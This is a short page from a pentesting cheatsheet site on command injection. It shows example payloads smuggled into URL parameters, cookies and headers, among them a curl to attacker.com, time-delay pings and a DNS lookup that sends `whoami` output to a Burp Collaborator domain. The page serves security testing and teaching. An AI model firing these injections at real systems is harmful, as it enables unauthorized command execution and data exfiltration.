Pentesting and Red Teaming Notes
  • 🖥️Pentesting and Red Teaming Cheatsheet
  • Web Application Pentesting(BlackBox)
    • SQL Injection
    • Blind SQL Injection
    • Path Traversal
    • Attacking Authentication
    • Race Conditions
    • Business Logic Vulnerabilities
    • Command Injections
    • Information disclosure
    • Access Controls
    • File upload Attacks
    • XXE
    • Server Side Request Forgery
    • Api Testing
    • noSQL
    • DOM based vulnerabilities
    • Cross Site scripting
  • Infrastructure Pentesting
    • Windows Privilege Escalation
    • Attacking Active Directory
    • File Transfers and Download
    • Pivoting(Tunneling and Port Forwarding)
    • Linux Privilege Escalation
    • Stealing NTLM hashes
    • Tricks and Tips
  • Active Directory Pentesting
    • powershell theory
    • Methodology
    • domain enumeration
    • File Transfer
    • PowerShell ADModule
    • Local Privilege Escalation
    • PowerView Commands
    • ACLs Descriptions
    • ACLs Abuse
    • ACL
    • Trusts
    • User Hunting
    • group policy
    • Mimikatz
    • BloodHound
    • LateralMovement
    • Kerberoasting
    • defense bypasses
    • Set-SPN
    • ASREProasting
    • Unconstrained Delegation
    • Constrained Delegation
    • Resource Based Constrained Delegation
    • AD CS
    • Persistance
    • Priv Esc Trusts Inside Forest
    • MSSQL Servers
    • Priv Esc Trusts Across Forest
    • Tips And Tricks
    • Service Tickets and Abuses
  • Reconnaissance
    • Web Application Reconnaissance
    • External Reconnaissance
Powered by GitBook
On this page
  1. Web Application Pentesting(BlackBox)

Command Injections

Can occur anywhere just like SQLI. Can occur in url parameters, form fields, http headers, cookies, referrer header, etc.

http://example.com/page.jsp?id=1; ping 10.11.122.34

Set-Cookies: sessionId=123; path=/; domain=example.com; & nslookup yfew.burpcollaborator.net

GET /index.jsp
Host: example.com
User-Agent: Mozilla/5.0 (WIndows NT 10.0; x64)
Referrer: http://example.com/page.jsp?id=1; curl http://attacker.com

Can also exist in submit feedback section, subscribe to newsletter, contact us, etc

mail -s "user feedback" -a From:user@example.com

using & ping -c5 127.0.0.1 & we can cause delay of 5 seconds so we can identify like this as well

& nslookup `whoami`.burpcollaborator.net
PreviousBusiness Logic VulnerabilitiesNextInformation disclosure

Last updated 10 months ago